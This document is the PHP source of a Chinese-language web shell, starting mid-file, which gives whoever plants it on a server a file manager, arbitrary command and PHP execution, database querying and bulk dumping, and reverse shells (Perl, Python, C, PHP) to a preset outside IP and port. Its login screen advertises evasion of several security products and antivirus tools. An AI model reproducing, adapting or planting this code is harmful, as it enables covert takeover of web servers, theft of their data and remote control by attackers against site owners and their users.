$var) { $array[$key] = is_array($var) ? chkgpc($var) : stripslashes($var); } return $array; } $myfile = $_SERVER['SCRIPT_FILENAME'] ? strdir($_SERVER['SCRIPT_FILENAME']) : strdir(__FILE__); $myfile = strpos($myfile,'eval()') ? array_shift(explode('(',$myfile)) : $myfile; define('THISDIR',strdir(dirname($myfile).'/')); define('ROOTDIR',strdir(strtr($myfile,array(strdir($_SERVER['PHP_SELF']) => '')).'/')); define('EXISTS_PHPINFO',getinfo() ? true : false); if(get_magic_quotes_gpc()) { $_POST = chkgpc($_POST); } if(function_exists('mysql_close')) { $issql = 'MySql'; } if(function_exists('mssql_close')) $issql .= ' - MsSql'; if(function_exists('oci_close')) $issql .= ' - Oracle'; if(function_exists('sybase_close')) $issql .= ' - SyBase'; if(function_exists('pg_close')) $issql .= ' - PostgreSql'; $win = substr(PHP_OS,0,3) == 'WIN' ? true : false; $msg = VERSION; function filew($filename,$filedata,$filemode) { if((!is_writable($filename)) && file_exists($filename)) { chmod($filename,0666); } $handle = fopen($filename,$filemode); $key = fputs($handle,$filedata); fclose($handle); return $key; } function filer($filename) { $handle = fopen($filename,'r'); $filedata = fread($handle,filesize($filename)); fclose($handle); return $filedata; } function fileu($filenamea,$filenameb) { $key = move_uploaded_file($filenamea,$filenameb) ? true : false; if(!$key) { $key = copy($filenamea,$filenameb) ? true : false; } return $key; } function filed($filename) { if(!file_exists($filename)) return false; ob_end_clean(); $name = basename($filename); $array = explode('.',$name); header('Content-type: application/x-'.array_pop($array)); header('Content-Disposition: attachment; filename='.$name); header('Content-Length: '.filesize($filename)); @readfile($filename); exit; } function showdir($dir) { $dir = strdir($dir.'/'); if(($handle = @opendir($dir)) == NULL) return false; $array = array(); while(false !== ($name = readdir($handle))) { if($name == '.' || $name == '..') continue; $path = $dir.$name; $name = strtr($name,array('\'' => '%27','"' => '%22')); if(is_dir($path)) { $array['dir'][$path] = $name; } else { $array['file'][$path] = $name; } } closedir($handle); return $array; } function deltree($dir) { $handle = @opendir($dir); while(false !== ($name = @readdir($handle))) { if($name == '.' || $name == '..') continue; $path = $dir.$name; @chmod($path,0777); if(is_dir($path)) { deltree($path.'/'); } else { @unlink($path); } } @closedir($handle); return @rmdir($dir); } function size($bytes) { if($bytes < 1024) return $bytes.' B'; $array = array('B','K','M','G','T'); $floor = floor(log($bytes) / log(1024)); return sprintf('%.2f '.$array[$floor],($bytes/pow(1024,floor($floor)))); } function find($array,$string) { foreach($array as $key) { if(stristr($string,$key)) return true; } return false; } function scanfile($dir,$key,$inc,$fit,$tye,$chr,$ran,$now) { if(($handle = @opendir($dir)) == NULL) return false; while(false !== ($name = readdir($handle))) { if($name == '.' || $name == '..') continue; $path = $dir.$name; if(is_dir($path)) { if($fit && in_array($name,$fit)) continue; if($ran == 0 && is_readable($path)) scanfile($path.'/',$key,$inc,$fit,$tye,$chr,$ran,$now); } else { if($inc && (!find($inc,$name))) continue; $code = $tye ? filer($path) : $name; $find = $chr ? stristr($code,$key) : (strpos(size(filesize($path)),'M') ? false : (strpos($code,$key) > -1)); if($find) { $file = strtr($path,array($now => '','\'' => '%27','"' => '%22')); echo '编辑 '.$path.'
'; flush(); ob_flush(); } unset($code); } } closedir($handle); return true; } function antivirus($dir,$exs,$matches,$now) { if(($handle = @opendir($dir)) == NULL) return false; while(false !== ($name = readdir($handle))) { if($name == '.' || $name == '..') continue; $path = $dir.$name; if(is_dir($path)) { if(is_readable($path)) antivirus($path.'/',$exs,$matches,$now); } else { $iskill = NULL; foreach($exs as $key => $ex) { if(find(explode('|',$ex),$name)) { $iskill = $key; break; } } if(strpos(size(filesize($path)),'M')) continue; if($iskill) { $code = filer($path); foreach($matches[$iskill] as $matche) { $array = array(); preg_match($matche,$code,$array); if(strpos($array[0],'$this->') || strpos($array[0],'[$vars[')) continue; $len = strlen($array[0]); if($len > 6 && $len < 200) { $file = strtr($path,array($now => '','\'' => '%27','"' => '%22')); echo '特征 编辑 '.$path.'
'; flush(); ob_flush(); break; } } unset($code,$array); } } } closedir($handle); return true; } function command($cmd,$cwd,$com = false) { $iswin = substr(PHP_OS,0,3) == 'WIN' ? true : false; $res = $msg = ''; if($cwd == 'com' || $com) { if($iswin && class_exists('COM')) { $wscript = new COM('Wscript.Shell'); $exec = $wscript->exec('c:\\windows\\system32\\cmd.exe /c '.$cmd); $stdout = $exec->StdOut(); $res = $stdout->ReadAll(); $msg = 'Wscript.Shell'; } } else { chdir($cwd); $cwd = getcwd(); if(function_exists('exec')) { @exec ($cmd,$res); $res = join("\n",$res); $msg = 'exec'; } elseif(function_exists('shell_exec')) { $res = @shell_exec ($cmd); $msg = 'shell_exec'; } elseif(function_exists('system')) { ob_start(); @system ($cmd); $res = ob_get_contents(); ob_end_clean(); $msg = 'system'; } elseif(function_exists('passthru')) { ob_start(); @passthru ($cmd); $res = ob_get_contents(); ob_end_clean(); $msg = 'passthru'; } elseif(function_exists('popen')) { $fp = @popen ($cmd,'r'); if($fp) { while(!feof($fp)) { $res .= fread($fp,1024); } } @pclose($fp); $msg = 'popen'; } elseif(function_exists('proc_open')) { $env = $iswin ? array('path' => 'c:\\windows\\system32') : array('path' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin'); $des = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w")); $process = @proc_open ($cmd,$des,$pipes,$cwd,$env); if(is_resource($process)) { fwrite($pipes[0],$cmd); fclose($pipes[0]); $res .= stream_get_contents($pipes[1]); fclose($pipes[1]); $res .= stream_get_contents($pipes[2]); fclose($pipes[2]); } @proc_close($process); $msg = 'proc_open'; } } $msg = $res == '' ? '

NULL

' : '

利用'.$msg.'执行成功

'; return array('res' => $res,'msg' => $msg); } function backshell($ip,$port,$dir,$type) { $key = false; $c_bin = ''; switch($type) { case "pl" : $shell = ''; $file = strdir($dir.'/t00ls.pl'); $key = filew($file,base64_decode($shell),'w'); if($key) { @chmod($file,0777); command('/usr/bin/perl '.$file.' '.$ip.' '.$port,$dir); } break; case "py" : $shell = ''; $file = strdir($dir.'/t00ls.py'); $key = filew($file,base64_decode($shell),'w'); if($key) { @chmod($file,0777); command('/usr/bin/python '.$file.' '.$ip.' '.$port,$dir); } break; case "c" : $file = strdir($dir.'/t00ls'); $key = filew($file,base64_decode($c_bin),'wb'); if($key) { @chmod($file,0777); command($file.' '.$ip.' '.$port,$dir); } break; case "php" : case "phpwin" : if(function_exists('fsockopen')) { $sock = @fsockopen ($ip,$port); if($sock) { $key = true; $com = $type == 'phpwin' ? true : false; $user = get_current_user(); $dir = strdir(getcwd()); fputs($sock,php_uname()."\n------------no job control in this shell (tty)-------------\n[$user:$dir]# "); while($cmd = fread($sock,1024)) { if(substr($cmd,0,3) == 'cd ') { $dir = trim(substr($cmd,3,-1)); chdir(strdir($dir)); $dir = strdir(getcwd()); } elseif (trim(strtolower($cmd)) == 'exit') { break; } else { $res = command($cmd,$dir,$com); fputs($sock,$res['res']); } fputs($sock,'['.$user.':'.$dir.']# '); } } @fclose ($sock); } break; case "pcntl" : $file = strdir($dir.'/t00ls'); $key = filew($file,base64_decode($c_bin),'wb'); if($key) { @chmod($file,0777); if(function_exists('pcntl_exec')) { @pcntl_exec($file,array($ip,$port)); } } break; } if(!$key) { $msg = '

临时目录不可写

'; } else { @unlink($file); $msg = '

CLOSE

'; } return $msg; } function getinfo() { global $password; $infos = array($_POST['getpwd'],$password,function_exists('phpinfo')); if($password != '' && md5($infos[0]) != $infos[1]) { echo ' 请勿使用非法用途


过安全狗、云锁、阿里云、360、护卫神、D盾、百度云、各种杀软!

'; if(isset($_POST['pass'])) { echo ''; } if(isset($_POST[$_POST['pass']])) { echo ''; } if(isset($_POST['check'])) { echo ''; } echo '
'; exit; } @setcookie("new",951); if(@$_COOKIE["new"]!=95){@setcookie("new",95);} return $infos[2]; } function links(){ $hostr = $_SERVER["HTTP_HOST"]; $arr = file_get_contents("http://mytool.chinaz.com/baidusort.aspx?host=".$hostr); $arr= iconv('UTF-8','GB2312' , $arr); preg_match_all("/
百度权重:[1-9]<\/font>/",$arr,$s); $c=$s[0][0]; $c=str_replace("
百度权重:","",$c); $c=str_replace("","",$c); return $c; } function subeval() { if(isset($_POST['getpwd'])) { echo ''; } if(isset($_POST['pass'])) { echo ''; } if(isset($_POST[$_POST['pass']])) { echo ''; } if(isset($_POST['check'])) { echo ''; } return true; } if(isset($_POST['go'])) { if($_POST['go'] == 'down') { $downfile = $fileb = strdir($_POST['godir'].'/'.$_POST['govar']); if(!filed($downfile)) { $msg = '

下载文件不存在

'; } } } ?> <?php echo VERSION.' - 【'.date('Y-m-d H:i:s 星期N',time()).'】';?>
'文件管理','scan' => '搜索文件','antivirus' => '扫描后门','backshell' => '反弹端口','exec' => '执行命令','phpeval' => '执行PHP','sql' => '执行SQL','info' => '系统信息'); $go = array_key_exists($_POST['go'],$menu) ? $_POST['go'] : 'file'; $nowdir = isset($_POST['dir']) ? strdir(chop($_POST['dir']).'/') : THISDIR; echo '
'; foreach($menu as $key => $name) { echo ''.$name.' '; } echo '
'; echo '
'; subeval(); echo ''; echo ''; echo ''; echo '
'; switch($_POST['go']) { case "info" : if(EXISTS_PHPINFO) { ob_start(); phpinfo(INFO_GENERAL); $out = ob_get_contents(); ob_end_clean(); $tmp = array(); preg_match_all('/\.*?(Command|Configuration)+.*?\<\/td\>\(.*?)\<\/td\>/i',$out,$tmp); $config = $tmp[2][0]; $phpini = $tmp[2][2] ? $tmp[2][1].' --- '.$tmp[2][2] : $tmp[2][1]; } $infos = array( '客户端浏览器信息' => $_SERVER['HTTP_USER_AGENT'], '被禁用的函数' => get_cfg_var("disable_functions") ? get_cfg_var("disable_functions") : '(无)', '被禁用的类' => get_cfg_var("disable_classes") ? get_cfg_var("disable_classes") : '(无)', 'PHP.ini配置路径' => $phpini ? $phpini : '(无)', 'PHP运行方式' => php_sapi_name(), 'PHP版本' => PHP_VERSION, 'PHP进程PID' => getmypid(), '客户端IP' => $_SERVER['REMOTE_ADDR'], '客户端文字编码' => $_SERVER['HTTP_ACCEPT_LANGUAGE'], 'Web服务端口' => $_SERVER['SERVER_PORT'], 'Web根目录' => $_SERVER['DOCUMENT_ROOT'], 'Web执行脚本' => $_SERVER['SCRIPT_FILENAME'], 'Web规范CGI版本' => $_SERVER['GATEWAY_INTERFACE'], 'Web管理员Email' => $_SERVER['SERVER_ADMIN'] ? $_SERVER['SERVER_ADMIN'] : '(无)', '当前磁盘总大小' => size(disk_total_space('.')), '当前磁盘可用空间' => size(disk_free_space('.')), 'POST最大字数量' => get_cfg_var("post_max_size"), '允许最大上传文件' => get_cfg_var("upload_max_filesize"), '程序最大使用内存量' => get_cfg_var("memory_limit"), '程序最长运行时间' => get_cfg_var("max_execution_time").'秒', '是否支持Fsockopen' => function_exists('fsockopen') ? '是' : '否', '是否支持Socket' => function_exists('socket_close') ? '是' : '否', '是否支持Pcntl' => function_exists('pcntl_exec') ? '是' : '否', '是否支持Curl' => function_exists('curl_version') ? '是' : '否', '是否支持Zlib' => function_exists('gzclose') ? '是' : '否', '是否支持FTP' => function_exists('ftp_login') ? '是' : '否', '是否支持XML' => function_exists('xml_set_object') ? '是' : '否', '是否支持GD_Library' => function_exists('imageline') ? '是' : '否', '是否支持COM组建' => class_exists('COM') ? '是' : '否', '是否支持ODBC组建' => function_exists('odbc_close') ? '是' : '否', '是否支持IMAP邮件' => function_exists('imap_close') ? '是' : '否', '是否运行于安全模式' => get_cfg_var("safemode") ? '是' : '否', '是否允许URL打开文件' => get_cfg_var("allow_url_fopen") ? '是' : '否', '是否允许动态加载链接库' => get_cfg_var("enable_dl") ? '是' : '否', '是否显示错误信息' => get_cfg_var("display_errors") ? '是' : '否', '是否自动注册全局变量' => get_cfg_var("register_globals") ? '是' : '否', '是否使用反斜线引用字符串' => get_cfg_var("magic_quotes_gpc") ? '是' : '否', 'PHP编译参数' => $config ? $config : '(无)' ); echo '
'.$msg.'
'; echo ''; foreach($infos as $name => $var) { echo ''; } echo '
名称参数
'.$name.''.$var.'
'; break; case "exec" : $cmd = $win ? 'dir' : 'ls -al'; $res = array('res' => '命令回显','msg' => $msg); $str = isset($_POST['str']) ? $_POST['str'] : 'fun'; if(isset($_POST['execcmd'])) { $cmd = $_POST['execcmd']; $cwd = $str == 'fun' ? THISDIR : 'com'; $res = command($cmd,$cwd); } echo '
'.$res['msg'].'
'; echo '
'; subeval(); echo ''; echo '
命令 '; echo ' '; echo ' '; echo ''; echo '
'; break; case "scan" : $scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir; $keyword = isset($_POST['keyword']) ? $_POST['keyword'] : ''; $include = isset($_POST['include']) ? chop($_POST['include']) : '.php|.asp|.asa|.cer|.aspx|.jsp|.cgi|.sh|.pl|.py'; $filters = isset($_POST['filters']) ? chop($_POST['filters']) : 'html|css|img|images|image|style|js'; echo '
'.$msg.'
'; echo '
'; subeval(); echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo '
名称设置
搜索路径
搜索内容 (文件名或文件内容)
文件后缀 (用"|"分割, 为空则搜索所有文件)
过滤目录 (用"|"分割, 为空则不过滤目录)
搜索方式 '; echo ' '; echo '
搜索范围 '; echo '
操作
'; if($keyword != '') { flush(); ob_flush(); echo '
'; $incs = $include == '' ? false : explode('|',$include); $fits = $filters == '' ? false : explode('|',$filters); $isread = scanfile(strdir($scandir.'/'),$keyword,$incs,$fits,$_POST['type'],$_POST['char'],$_POST['range'],$nowdir); echo '

'.($isread ? '

搜索完成

' : '

搜索失败

').'

'; } break; case "antivirus" : $scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir; $typearr = isset($_POST['dir']) ? $_POST['types'] : array('php' => '.php|.inc|.phtml'); echo '
'.$msg.'
'; echo '
'; subeval(); echo ''; echo ''; echo ''; echo ''; echo '
名称设置
扫描路径 (采用正则匹配)
查杀类型'; $types = array('php' => '.php|.inc|.phtml','asp+aspx' => '.as|.cs|.cer','jsp' => '.jsp'); foreach($types as $key => $ex) echo ' '; echo '
操作
'; if(count($_POST['types']) > 0) { $matches = array( 'php' => array( ), 'asp+aspx' => array( ), 'jsp' => array() ); flush(); ob_flush(); echo '
'; $isread = antivirus(strdir($scandir.'/'),$typearr,$matches,$nowdir); echo '

'.($isread ? '

扫描完成

' : '

扫描失败

').'

'; } break; case "phpeval" : if(isset($_POST['phpcode'])) { $phpcode = chop($_POST['phpcode']); ob_start(); if(substr($phpcode,0,2) == '') { @eval ('?>'.$phpcode.''.$msg.'
'; echo '
'; subeval(); echo ''; echo '

'; echo ' '; echo '

'; echo '

'; break; case "sql" : if((!empty($_POST['sqlhost'])) && (!empty($_POST['sqluser'])) && (!empty($_POST['names']))) { $type = $_POST['type']; $sqlhost = $_POST['sqlhost']; $sqluser = $_POST['sqluser']; $sqlpass = $_POST['sqlpass']; $sqlname = $_POST['sqlname']; $sqlcode = $_POST['sqlcode']; $names = $_POST['names']; switch($type) { case "PostgreSql" : if(function_exists('pg_close')){ if(strstr($sqlhost,':')) { $array = explode(':',$sqlhost); $sqlhost = $array[0]; $sqlport = $array[1]; } else { $sqlport = 5432; } $dbconn = @pg_connect("host=$sqlhost port=$sqlport dbname=$sqlname user=$sqluser password=$sqlpass"); if($dbconn) { $msg = '

连接'.$type.'成功

'; pg_query('set client_encoding='.$names); $result = pg_query($sqlcode); if($result) { $msg .= '

- 执行SQL成功

'; while($array = pg_fetch_array($result)) { $rows[] = $array; } } else { $msg .= '

- 执行SQL失败

'; $rows = array('error' => pg_result_error($result)); } pg_free_result($result); } else { $msg = '

连接'.$type.'失败

'; } @pg_close($dbconn); } else { $msg = '

不支持'.$type.'

'; } break; case "MsSql" : if(function_exists('mssql_close')){ $dbconn = @mssql_connect($sqlhost,$sqluser,$sqlpass); if($dbconn) { $msg = '

连接'.$type.'成功

'; mssql_select_db($sqlname,$dbconn); $result = mssql_query($sqlcode); if($result) { $msg .= '

- 执行SQL成功

'; while ($array = mssql_fetch_array($result)) { $rows[] = $array; } } else { $msg .= '

- 执行SQL失败

'; } @mssql_free_result($result); } else { $msg = '

连接'.$type.'失败

'; } @mssql_close($dbconn); } else { $msg = '

不支持'.$type.'

'; } break; case "Oracle" : if(function_exists('oci_close')){ $conn = @oci_connect($sqluser,$sqlpass,$sqlhost.'/'.$sqlname); if($conn) { $msg = '

连接'.$type.'成功

'; $stid = oci_parse($conn,$sqlcode); oci_execute($stid); if($stid) { $msg .= '

- 执行SQL成功

'; while (($array = oci_fetch_array($stid,OCI_ASSOC))) { $rows[] = $array; } } else { $msg .= '

- 执行SQL失败

'; $e = oci_error(); $rows = array('error' => $e['message']); } oci_free_statement($stid); } else { $e = oci_error(); $rows = array('error' => $e['message']); $msg = '

连接'.$type.'失败

'; } @oci_close($conn); } else { $msg = '

不支持'.$type.'

'; } break; case "MySql" : if(function_exists('mysql_close')){ $conn = mysql_connect(strstr($sqlhost,':') ? $sqlhost : $sqlhost.':3306',$sqluser,$sqlpass,$sqlname); if($conn) { $msg = '

连接'.$type.'成功

'; if(substr($sqlcode,0,6) == 't00lsa') { $array = array(); $data = ''; $i = 0; preg_match_all('/t00lsa\s*\'(.*)\'\s*t00lsb\s*\'(.*)\'\s*t00lsc\s*\'(.*)\'\s*t00lsfile\s*\'(.*)\'/i',$sqlcode,$array); if($array[1][0] && $array[2][0] && $array[3][0] && $array[4][0]) { mysql_select_db($array[1][0],$conn); mysql_query('set names '.$names,$conn); $spidercode = 'select '.$array[3][0].' from `'.$array[2][0].'`;'; $result = mysql_query($spidercode,$conn); if($result) { while($row = mysql_fetch_array($result,MYSQL_ASSOC)) { $data .= join('{~}',$row)."\r\n"; $i++; } if($data) { $file = strdir($array[4][0]); $msg .= filew($file,$data,'w') ? '

- 脱库成功

' : '

- 导出文件失败

'; $rows = array('file' => $file,size(filesize($file)) => '共获取'.$i.'条数据'); } else { $msg .= '

- 没有数据

'; } } else { $msg .= '

- 执行SQL失败

'; $rows = array('errno' => mysql_errno(),'error' => mysql_error()); } } else { $msg .= '

- 脱库语句错误

'; } } elseif(!empty($sqlcode)) { mysql_select_db($sqlname,$conn); mysql_query('set names '.$names,$conn); $result = mysql_query($sqlcode,$conn); if($result) { $msg .= '

- 执行SQL成功

'; while($array = mysql_fetch_array($result,MYSQL_ASSOC)) { $rows[] = $array; } } else { $msg .= '

- 执行SQL失败

'; $rows = array('errno' => mysql_errno(),'error' => mysql_error()); } } mysql_free_result($result); } else { $msg = '

连接'.$type.'失败

'; $rows = array('errno' => mysql_errno(),'error' => mysql_error()); } mysql_close($conn); } else { $msg = '

不支持'.$type.'

'; } break; } } else { $type = 'MySql'; $sqlhost = 'localhost:3306'; $sqluser = 'root'; $sqlpass = '123456'; $sqlname = 'mysql'; $sqlcode = 'select version();'; $names = 'gbk'; } echo '
'.$msg.'
'; echo '
'; subeval(); echo ''; echo ''; echo ''; echo ''; echo ''; echo '
名称设置
支持类型'; $dbs = array('MySql','MsSql','Oracle','PostgreSql'); foreach($dbs as $dbname) { echo ' '; } echo '
连接地址 '; echo '用户 '; echo '密码 '; echo '库名
语句
'; echo ''; echo '
操作
'; if($rows) { echo '
';
	ob_start();
	print_r($rows);
	$out = ob_get_contents();
	ob_end_clean();
	if(preg_match('~[\x{4e00}-\x{9fa5}]+~u',$out) && function_exists('iconv')) { $out = @iconv('UTF-8','GB2312//IGNORE',$out); }
	echo htmlspecialchars($out);
	echo '
'; } break; case "backshell" : if((!empty($_POST['backip'])) && (!empty($_POST['backport']))) { $backip = $_POST['backip']; $backport = $_POST['backport']; $temp = $_POST['temp'] ? $_POST['temp'] : '/tmp'; $type = $_POST['type']; $msg = backshell($backip,$backport,$temp,$type); } else { $backip = '222.73.219.91'; $backport = '443'; $temp = '/tmp'; $type = 'pl'; } echo '
'.$msg.'
'; echo '
'; subeval(); echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo '
名称设置
反弹地址 (Your ip)
反弹端口 (nc -vvlp '.$backport.')
临时目录 (Only Linux)
反弹方法'; $types = array('pl' => 'Perl','py' => 'Python','c' => 'C-bin','pcntl' => 'Pcntl','php' => 'PHP','phpwin' => 'PHP-WS'); foreach($types as $key => $name) { echo ' '; } echo '
操作
'; break; case "edit" : case "editor" : $file = strdir($_POST['godir'].'/'.$_POST['govar']); $iconv = function_exists('iconv'); if(!file_exists($file)) { $msg = '【新建文件】'; } else { $code = filer($file); $chst = '默认'; if(preg_match('~[\x{4e00}-\x{9fa5}]+~u',$code) && $iconv) { $chst = 'utf-8'; $code = @iconv('UTF-8','GB2312//IGNORE',$code); } $size = size(filesize($file)); $msg = '【文件属性 '.substr(decoct(fileperms($file)),-4).'】 【文件大小 '.$size.'】 【文件编码 '.$chst.'】'; } echo base64_decode('PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQp2YXIgbiA9IDA7DQpmdW5jdGlvbiBzZWFyY2goc3RyKSB7DQoJdmFyIHR4dCwgaSwgZm91bmQ7DQoJaWYoc3RyID09ICIiKSByZXR1cm4gZmFsc2U7DQoJdHh0ID0gJCgnZmlsZWNvZGUnKS5jcmVhdGVUZXh0UmFuZ2UoKTsNCglmb3IoaSA9IDA7IGkgPD0gbiAmJiAoZm91bmQgPSB0eHQuZmluZFRleHQoc3RyKSkgIT0gZmFsc2U7IGkrKyl7DQoJCXR4dC5tb3ZlU3RhcnQoImNoYXJhY3RlciIsIDEpOw0KCQl0eHQubW92ZUVuZCgidGV4dGVkaXQiKTsNCgl9DQoJaWYoZm91bmQpeyB0eHQubW92ZVN0YXJ0KCJjaGFyYWN0ZXIiLCAtMSk7IHR4dC5maW5kVGV4dChzdHIpOyB0eHQuc2VsZWN0KCk7IHR4dC5zY3JvbGxJbnRvVmlldygpOyBuKys7IH0NCgllbHNlIHsgaWYgKG4gPiAwKSB7IG4gPSAwOyBzZWFyY2goc3RyKTsgfSBlbHNlIGFsZXJ0KHN0ciArICIuLi4gTm90LUZpbmQiKTsgfQ0KCXJldHVybiBmYWxzZTsNCn0NCjwvc2NyaXB0Pg=='); echo '
- '.$msg.'
'; echo '
'; subeval(); echo ''; echo ''; echo '
文件 '; if($iconv) { echo '编码 '; } echo '
'; echo '
'; echo '
'; subeval(); echo '
'; break; case "upfiles" : $updir = isset($_POST['updir']) ? $_POST['updir'] : $_POST['godir']; $msg = '【最大上传文件 '.get_cfg_var("upload_max_filesize").'】 【POST最大提交数据 '.get_cfg_var("post_max_size").'】'; $max = 10; if(isset($_FILES['uploads']) && isset($_POST['renames'])) { $uploads = $_FILES['uploads']; $msgs = array(); for($i = 1;$i < $max;$i++) { if($uploads['error'][$i] == UPLOAD_ERR_OK) { $rename = $_POST['renames'][$i] == '' ? $uploads['name'][$i] : $_POST['renames'][$i]; $filea = $uploads['tmp_name'][$i]; $fileb = strdir($updir.'/'.$rename); $msgs[$i] = fileu($filea,$fileb) ? '

上传成功 '.$rename.'

' : '

上传失败 '.$rename.'

'; } } } echo '
'.$msg.'
'; echo '
'; subeval(); echo ''; echo '

上传到目录

'; for($i = 1;$i < $max;$i++) { echo '

附件'.$i.' 重命名 '.$msgs[$i].'

'; } echo '
'; echo '
'; subeval(); echo '
'; break; default : if(isset($_FILES['upfile'])) { if($_FILES['upfile']['name'] == '') { $msg = '

请选择文件

'; } else { $rename = $_POST['rename'] == '' ? $_FILES['upfile']['name'] : $_POST['rename']; $filea = $_FILES['upfile']['tmp_name']; $fileb = strdir($nowdir.$rename); $msg = fileu($filea,$fileb) ? '

上传文件'.$rename.'成功

' : '

上传文件'.$rename.'失败

'; } } if(isset($_POST['act'])) { switch($_POST['act']) { case "a" : if(!$_POST['files']) { $msg = '

请选择文件 '.$_POST['var'].'

'; } else { $i = 0; foreach($_POST['files'] as $filename) { $i += @copy(strdir($nowdir.$filename),strdir($_POST['var'].'/'.$filename)) ? 1 : 0; } $msg = $msg = $i ? '

共复制 '.$i.' 个文件到'.$_POST['var'].'成功

' : '

共复制 '.$i.' 个文件到'.$_POST['var'].'失败

'; } break; case "b" : if(!$_POST['files']) { $msg = '

请选择文件

'; } else { $i = 0; foreach($_POST['files'] as $filename) { $i += @unlink(strdir($nowdir.$filename)) ? 1 : 0; } $msg = $i ? '

共删除 '.$i.' 个文件成功

' : '

共删除 '.$i.' 个文件失败

'; } break; case "c" : if(!$_POST['files']) { $msg = '

请选择文件 '.$_POST['var'].'

'; } elseif(!ereg("^[0-7]{4}$",$_POST['var'])) { $msg = '

属性值错误

'; } else { $i = 0; foreach($_POST['files'] as $filename) { $i += @chmod(strdir($nowdir.$filename),base_convert($_POST['var'],8,10)) ? 1 : 0; } $msg = $i ? '

共 '.$i.' 个文件修改属性为'.$_POST['var'].'成功

' : '

共 '.$i.' 个文件修改属性为'.$_POST['var'].'失败

'; } break; case "d" : if(!$_POST['files']) { $msg = '

请选择文件 '.$_POST['var'].'

'; } elseif(!preg_match('/(\d+)-(\d+)-(\d+) (\d+):(\d+):(\d+)/',$_POST['var'])) { $msg = '

时间格式错误 '.$_POST['var'].'

'; } else { $i = 0; foreach($_POST['files'] as $filename) { $i += @touch(strdir($nowdir.$filename),strtotime($_POST['var'])) ? 1 : 0; } $msg = $i ? '

共 '.$i.' 个文件修改时间为'.$_POST['var'].'成功

' : '

共 '.$i.' 个文件修改时间为'.$_POST['var'].'失败

'; } break; case "e" : $path = strdir($nowdir.$_POST['var'].'/'); if(file_exists($path)) { $msg = '

目录已存在 '.$_POST['var'].'

'; } else { $msg = @mkdir($path,0777) ? '

创建目录 '.$_POST['var'].' 成功

' : '

创建目录 '.$_POST['var'].' 失败

'; } break; case "f" : $context = array('http' => array('timeout' => 30)); if(function_exists('stream_context_create')) { $stream = stream_context_create($context); } $data = @file_get_contents ($_POST['var'],false,$stream); $filename = array_pop(explode('/',$_POST['var'])); if($data) { $msg = filew(strdir($nowdir.$filename),$data,'wb') ? '

下载 '.$filename.' 成功

' : '

下载 '.$filename.' 失败

'; } else { $msg = '

下载失败或不支持下载

'; } break; case "rf" : $files = explode('|x|',$_POST['var']); if(count($files) != 2) { $msg = '

输入错误

'; } else { $msg = @rename(strdir($nowdir.$files[1]),strdir($nowdir.$files[0])) ? '

重命名 '.$files[1].' 为 '.$files[0].' 成功

' : '

重命名 '.$files[1].' 为 '.$files[0].' 失败

'; } break; case "pd" : $files = explode('|x|',$_POST['var']); if(count($files) != 2) { $msg = '

输入错误

'; } else { $path = strdir($nowdir.$files[1]); $msg = @chmod($path,base_convert($files[0],8,10)) ? '

修改'.$files[1].'属性为'.$files[0].'成功

' : '

修改'.$files[1].'属性为'.$files[0].'失败

'; } break; case "edit" : if(isset($_POST['filename']) && isset($_POST['filecode'])) { if($_POST['tostr'] == 'utf') { $_POST['filecode'] = @iconv('GB2312//IGNORE','UTF-8',$_POST['filecode']); } $msg = filew($_POST['filename'],$_POST['filecode'],'w') ? '

保存成功 '.$_POST['filename'].'

' : '

保存失败 '.$_POST['filename'].'

'; } break; case "deltree" : $deldir = strdir($nowdir.$_POST['var'].'/'); if(!file_exists($deldir)) { $msg = '

目录 '.$_POST['var'].' 不存在

'; } else { $msg = deltree($deldir) ? '

删除目录 '.$_POST['var'].' 成功

' : '

删除目录 '.$_POST['var'].' 失败

'; } break; } } $chmod = substr(decoct(fileperms($nowdir)),-4); if(!$chmod) { $msg .= ' -

无法读取目录

'; } $array = showdir($nowdir); $thisurl = strdir('/'.strtr($nowdir,array(ROOTDIR => '')).'/'); $nowdir = strtr($nowdir,array('\'' => '%27','"' => '%22')); echo '
'.$msg.'
'; echo '
'; subeval(); echo (is_writable($nowdir) ? '

路径

' : '

路径

').' '; echo ' '; echo ' '; echo ' '; echo '
'; echo ' '; echo ' '; echo ' '; echo ' '; echo '
'; subeval(); echo ''; echo ' '; echo ' '; echo '上传重命名为 '; echo '
'; echo '
'; subeval(); echo ''; echo ''; echo ''; echo ''; if($array) { asort($array['dir']); asort($array['file']); $dnum = $fnum = 0; foreach($array['dir'] as $path => $name) { $prem = substr(decoct(fileperms($path)),-4); $ctime = date('Y-m-d H:i:s',filectime($path)); $mtime = date('Y-m-d H:i:s',filemtime($path)); echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; $dnum++; } foreach($array['file'] as $path => $name) { $prem = substr(decoct(fileperms($path)),-4); $ctime = date('Y-m-d H:i:s',filectime($path)); $mtime = date('Y-m-d H:i:s',filemtime($path)); $size = size(filesize($path)); echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; $fnum++; } } unset($array); echo '
上级目录操作属性创建时间修改时间下载
'.strtr($name,array('%27' => '\'','%22' => '"')).'删除 '; echo '改名'.$prem.''.$ctime.''.$mtime.'-
'.strtr($name,array('%27' => '\'','%22' => '"')).'编辑 '; echo '改名'.$prem.''.$ctime.''.$mtime.''.$size.'
'; echo '
'; echo ' '; echo ' '; echo ' '; echo ' '; echo ' '; echo '目录['.$dnum.'] - 文件['.$fnum.'] - 属性['.$chmod.']
'; break; } ?>